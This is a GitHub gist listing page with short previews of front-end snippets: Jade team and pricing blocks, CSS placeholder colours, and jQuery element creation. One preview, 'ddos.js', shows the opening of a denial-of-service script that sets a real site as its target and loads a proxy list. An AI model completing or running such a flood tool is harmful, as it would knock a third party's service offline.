Skip to content

Instantly share code, notes, and snippets.

View 6pm's full-sized avatar
💭
I may be slow to respond.

Slava 6pm

💭
I may be slow to respond.
View GitHub Profile
@6pm
6pm / jade
Created August 21, 2015 11:05
team-block
.col-md-4.col-sm-6.col-xs-12
.team__person
.team__person__info
h4.team__person__name John Doe
span.team__person__work Art-director
p Lorem ipsum dolor sit amet, consectetur adipisicing.
.team__person__social
a(href="#")
i.ion-social-facebook-outline
a(href="#")
@6pm
6pm / jade
Created August 21, 2015 11:01
pricing-block
.price__item.col-sm-4.animated.fadeOut
h3.price__title Service
span.reg ®
span.price__title__type Lite
ul.cd-pricing-features
li
span.ion-ios-checkmark-empty
|Premium support
li
span.ion-ios-checkmark-empty
@6pm
6pm / ddos.js
Last active August 29, 2015 14:23 — forked from venomjke/ddos.js
var request = require('request'),
util = require('util'),
fs = require('fs'),
events = require('events');
var attackUrl = 'http://ispi.ru/';
var proxyLists = [];
var proxyFile = __dirname+'/proxylist.txt';
var e = new events.EventEmitter;
@6pm
6pm / placeholder
Created February 19, 2015 10:14
стилізувати колір плейсхолдерів
::-webkit-input-placeholder { /* WebKit browsers */
color: #909;
}
:-moz-placeholder { /* Mozilla Firefox 4 to 18 */
color: #909;
opacity: 1;
}
::-moz-placeholder { /* Mozilla Firefox 19+ */
color: #909;
opacity: 1;
@6pm
6pm / new_gist_file_0
Created November 4, 2014 10:15
Створення елементів на льоту і додавання атрибутів і обработчиків
$("<div/>", {
"class": "clickme",
text: "Нажми на меня!",
click: function(){
$(this).html('Спасибо.');
}
}).appendTo("body");